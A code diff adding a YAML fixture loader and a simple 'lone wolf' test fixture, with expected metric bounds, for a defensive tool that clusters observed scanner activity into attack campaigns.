+        sessions.append(sess)
+        att.sessions.append(sess)
+        att.first_seen = started
+        att.last_seen = started
+
+
+def load_yaml(path: str | Path) -> dict[str, Any]:
+    """Read a fixture file. Kept tiny so tests can inline-build specs too."""
+    text = Path(path).read_text(encoding="utf-8")
+    parsed = yaml.safe_load(text)
+    if not isinstance(parsed, dict):
+        raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")
+    return parsed
--- a/tests/fixtures/campaigns/lone_wolf.expected.yaml
+++ b/tests/fixtures/campaigns/lone_wolf.expected.yaml
@@ -0,0 +1,17 @@
+# Bounds for fixture 3 (lone_wolf).
+#
+# Every actor in this fixture is a singleton (the wolf itself, plus
+# every background-noise scanner). A correct clusterer puts each in
+# its own cluster; that's a perfect score.
+#
+# Bounds are deliberately loose at first — we ratchet them up as the
+# algorithm matures. Loosening any bound to make CI pass requires
+# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2).
+adjusted_rand_index:
+  min: 0.85
+homogeneity:
+  min: 0.90
+completeness:
+  min: 0.80
+singleton_recall:
+  min: 0.95
--- a/tests/fixtures/campaigns/lone_wolf.yaml
+++ b/tests/fixtures/campaigns/lone_wolf.yaml
@@ -0,0 +1,32 @@
+# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2.
+#
+# One opportunistic scanner, Delivery phase only, no follow-up, no shared
+# signals with anyone else. Surrounded by background noise. The clusterer
+# must keep the wolf and every noise scanner as their own singleton —
+# none should be absorbed into anyone else.
+#
+# This is the simplest of the six fixtures and exists primarily to prove
+# the end-to-end pipeline (DSL → factory → clusterer → metrics) before
+# we invest in the harder scenarios.
+corpus:
+  campaigns:
+    - campaign:
+        id: lone-wolf-001
+        actors:
+          - id: wolf-a
+            asn: 14061
+            ip_pool: sticky
+            ja3: null
+            hassh: null
+            hours_active_utc: [3, 4, 5]
+            jitter_seconds: 30
+        phases:
+          - name: delivery
+            actor: wolf-a
+            target_selector:
+              service: any
+              count: 1
+            dwell_seconds: 1
+        duration_days: 1
+  noise:
+    scanner_count: 8